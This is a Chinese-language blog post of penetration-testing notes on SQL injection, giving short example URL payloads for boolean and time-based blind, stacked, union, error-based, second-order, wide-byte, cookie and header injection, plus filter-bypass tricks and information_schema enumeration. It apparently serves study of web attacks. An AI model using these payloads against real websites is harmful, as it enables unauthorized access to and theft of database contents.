SQL注入篇-网络渗透

最新推荐文章于 2024-07-31 10:04:13 发布
最新推荐文章于 2024-07-31 10:04:13 发布
阅读量200 收藏 1
点赞数
分类专栏: 网络安全 python 文章标签: sql 网络 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u011250160/article/details/113275632
版权 
1布尔盲注 返回结果只有正确或错误
	1.1构造比较语句可以判断出数据库库名的长度
	例:	?id=1 and length (database()) >= 1 --+
		?id=1 and length (database()) <= 10 --+
	    根据返回界面显示是否正常,从两边向中间逼近判断出正确的长度
	1.2利用substr()逐个截取得到库名,mid()也可以用于截取
		例:  ?id=1 and substr(database(),1,1)=‘t’ --+
		判断数据库库名的第一个字母是否为t
		?id=1 and substr(database(),2,1)=‘t’ --+
		判断数据库库名的第二个字母是否为t
	1.3利用ascii码转换后也可以通过比较得到库名,ord()也可以转码
		例:  ?id=1 and ascii(substr((select database()),1,1))> 100 --+
		参考上一种,这里是把数据库库名的第一个字母的ascii值取出来和1001.21.3的区别在于数据类型不同,1.2是字符型,1.3是数字型
		
2时间盲注,不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行来判断。
	需用if(expr1,expr2,expr3) 判断语句 
	如果expr1正确就执行expr2如果错误执行expr3
	例:	?id=1' and if(length(database())=8,0,sleep(5))--+
	如果数据库库名长度不为8,页面就会延时5秒返回
	
3堆叠查询注入,执行多条语句
	例:	?id=1;select if(length(database())=8,0,sleep(5))--+

4 联合查询注入,union联合查询
	例:	?id=-1 union select 1,2,3 --+

5 报错注入,查看报错信息
	例:	?id=1' or extractvalue(1,concat(user(),0x7e,version()))
		?id=1' or updatexml(1,concat(0x7e,(select database()))
		0x7eascii编码,解码为~

6 二次注入
	所需条件:1)用户向数据库插入恶意语句
			(2)数据库对自己存储的数据直接取出恶意数据给用户
	例:	已知登录账号为admin	我们注册新账号admin’# 
		修改admin’#的密码其中’#被认为是sql语句
		然后发现admin的密码被修改了admin’#的密码却没有变

7 宽字节注入
	所需条件:程序员设置MySQL连接时的错误配置set character_set_client=gbk
	原理:正常情况下GPC开启或者使用addslashes函数过滤GET或POST提交的参数时,我们测试输入的',就会被转义为\';
	若存在宽字节注入,输入%df%27时,经过单引号的转义变成了%df%5c%27,之后再数据库查询语句进行GBK多字节编码,
	即一个中文占用两个字节,一个英文同样占	用两个字节且在汉字编码范围内两个编码为一个汉字。
	然后MySQL服务器会对查询语句进行GBK编码即%df%5c转换成汉字"運",单引号逃逸出来,从而绕过转义造成注入漏洞

8 cookie 注入
	例:	目标网站为asp?id=1
		将地址栏改为javascript:alert(document.cookie="id="+escape("1"));
		出现id=1的弹窗,再访问asp?也能正常看到页面
		原理:request("参数名称"),当使用这样的方式获取数据时,ASP规定是按QueryString、Form、Cookies、ServerVariables的顺序来获取数据的。

9 base64 注入
	所需条件:传递参数经过base64编码

10 XFF 注入
	http请求头X-Forwarder-for表示客户端真实ip,可伪造ip
	可构造sql注入语句

1 大小写绕过
2 双写绕过
3 url编码绕过
4 内联注释绕过

MySQL 5.0 之后的版本默认在数据库中存在“information_schema”
三个表名“SCHEMATA”,“TABLES”,“COLUMNS”
SCHEMATA 存放的是该用户创建的所有数据库的库名,字段“SCHEMA_NAME”
TABLES 存放的是该用户创建的所有数据库的库名TABLE_SCHEMA和表名TABLE_NAME
COLUMNS 存放的是该用户创建的所有数据库的库名TABLE_SCHEMA,表名TABLE_NAME和字段名COLUMN_NAME
注释可以在sql注入时干扰并绕过
注释 #或/**/或- -空格 第三种注释在url里就是- -+
内联注释 /*!       code        */

几种框架
ASP + Access + IIS 5.0/6.0 + Windows Sever 2003
ASPX + MSSQL + IIS 7.0/7.5 + Windows Sever 2008
PHP + MySQL + IIS
PHP + MySQL + Apache
PHP + MySQL + Ngnix
JSP + MySQL + Ngnix
JSP + MSSQL + Tomcat
JSP + Oracle + Tomcat
VVeaker
关注
专栏目录
网络渗透测试实验三之XSS和SQL注入
weixin_47356546的博客
12-25 600
实验二 网络嗅探与身份认证 提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、pandas是什么?二、使用步骤1.引入库2.读入数据总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本文章正文内容,下面案例可供参考 一、pandas是什么? 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
【THM】SQL Injection(SQL注入)-初级渗透测试
追风少年亚索的博客
03-29 2261
撰写本文目的仅仅提供个人查看笔记用途,大家可以去官网查看,都一样的
网络渗透测试实验3:SQL注入(DVWA+SQLmap+Mysql注入实战)
zzzfff__的博客
11-21 2075
实验环境搭建。启动Metasploitable2虚拟机。1.输入账号密码【msfadmin】,输入【ip a】查询ip2.打开浏览器,输入该ip,进入DVWA输入账号密码:admin,password。账号密码使用nmap穷举,见我的另一博客3.注入点发现。首先肯定是要判断是否有注入漏洞。在输入框输入1,返回ID: 1返回正常;
SQL注入主要可以分为以下几种类型
最新发布
hljdengbaoceping的博客
07-31 543
3.布尔盲注:当SQL注入后服务器不直接返回查询结果,而是根据查询结果的真假影响页面的显示时(例如页面加载速度变化、特定内容的存在与否),攻击者通过构造带有布尔表达式的SQL语句,逐步推断出数据。2.联合查询注入:当原查询中使用了SELECT语句,并且错误信息返回时,攻击者可以通过UNION操作符将多个SELECT语句的结果合并,从而从其他表中提取敏感信息。1.基础注入:这是最直接的SQL注入形式,攻击者通过修改查询语句的某个参数,插入额外的SQL代码,改变原有查询逻辑,以达到非法获取数据的目的。
SQL注入分类与详解(转载)
weixin_30878361的博客
08-20 474
SQL注入分类与详解 原文地址:点击跳转 字数统计:11,729 字|阅读时长 ≈47 分钟 对SQL注入的大概分类总结,和一些基础的利用方法。 SQL注入是一种通过操纵输入来修改后台SQL语句以达到利用代码进行攻击的技术。 SQL注入产生的危害很多,比如后台用户及密码泄露、会员用户信息泄露、读写文件,甚至可以获得服务器权限。因此,SQL注入也是OWSP TOP ...
SQL注入分类,一看你就明白了。SQL注入点/SQL注入类型/SQL注入有几种/SQL注入点分类
热门推荐
wangyuxiang946的博客
02-18 2万+
根据输入的「参数」类型,可以将SQL注入分为两大类:「数值型」注入、「字符型」注入。 根据数据的「提交方式」分类:GET注入、POST注入、Cookie注入、HTTP Header注入。 根据页面「是否回显」分类:显注、盲注。
网络安全渗透SQL-Inject注入【概要总结】
我这不是依托答辩随你怎么说
03-05 224
回显注入、无回显注入、盲注(布尔、延时)加解密注入、JSON注入、LADP注入、DNSlog注入、二次注入、堆叠查询、更改提交方式、大小写混合、解密编码类、注释符混用、等价函数替换、特殊符号混用、借助数据库特性、HTTP参数污染、垃圾数据溢出、waf
SQL注入工具-御剑
06-07
网络安全领域,SQL注入是一种常见的攻击手段,而“御剑”则是一款专门用于检测和利用SQL注入漏洞的工具。御剑,以其独特的功能和易用性,深受安全研究人员和渗透测试人员的喜爱。这款工具能够帮助用户识别和利用...
web渗透测试详细入门实践课程-kali/sql注入
06-20
本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。 购买课程的同学可以获取价值200的教学资源...
渗透入侵\超级SQL注入工具 SSQLInjection V1.0.zip
07-15
超级SQL注入工具 SSQLInjection V1.0
记录一次SQL引起的内网渗透
这个时代,作为程序员可能要学习小程序
12-22 268
点击上方的终端研发部,右上角选择“设为星标”作者:i春秋作家原文:https://bbs.ichunqiu.com/thread-58227-1-1.html一 、 前言近期一直再学习内...
SQL注入攻击测试入实战(1)—成功渗透台湾某净化设备公司官网
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
09-11 1690
目录 声明:写在前面 1、 网站分析 2、初步渗透 3、注入sql测试 4、获取查询长度 5、获取数据库相关信息 6、通过注入,我们拿到了数据库的初步信息 写在前面 作为一个防御型白帽黑客​ 你一定要知道黑客的进攻套路 才能有相应的防御措施 声明:只做测试,发现对方的漏洞,并不进行破坏性操作 1、 网站分析 地址:http://www.xxx.com.tw/ 这是一家中国台湾地区的网站,看着满屏的繁体字,就不是很舒服 网站首页包括:关于我们、资料下载、联...
网络安全与渗透sql注入,一文详解(九)此生无悔入华夏,男儿何不带吴钩
qq_25490573的博客
11-02 1064
  中华人民共和国网络安全法 阅读本文前,请熟读并遵守中华人民共和国网络安全法: http://gkhy.jiujiang.gov.cn/zwgk_228/jc/zcwj/202006/P020200618385401918830.pdf   目录中华人民共和国网络安全法简介常见数据库及端口常见数据库连接工具information_schema数据库sql注入常用函数   简介 在owasp攻击排行榜中,sql注入始终名列前茅。sql注入可谓是网站安全隐患的头号大敌。 那sql
sql注入分类
weixin_33831673的博客
05-20 189
Sql注入根据数据提取通道的类型,从服务器接收到的响应等可以分为不同的类型. 基于从服务器接收到的响应 ▲基于错误的SQL注入 ▲联合查询的类型 ▲堆查询注射 ▲SQL盲注 •基于布尔SQL盲注 •基于时间的SQL盲注 •基于报错的SQL盲注 基于错误的SQ...
SQL注入分类
子曰小玖的博客
03-02 2409
**SQL全称是Structured Query Language** 是一种结构化的查询语言,用于与数据库进行交互并能够被数据库解析。SQL注入攻击是一种常见的注入攻击类型。攻击方式在用户与程序进行交互时发生的。如在表单输入、搜索框输入功能中插入SQL命令,然后发送到服务端。服务端对数据进行了解析执行,并执行了一些非预期的操作。 **按照注入点类型来分类** **(1)数字型注...
SQL注入大师指南:渗透测试实战技巧
总结起来,这文章讲述了SQL注入攻击在早期网络环境中作为黑客技术的影响力,以及如何通过熟练掌握基础技巧和利用特定工具进行有效的网络渗透。随着技术进步和安全意识的提升,现代的防御策略和工具已经大大加强,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值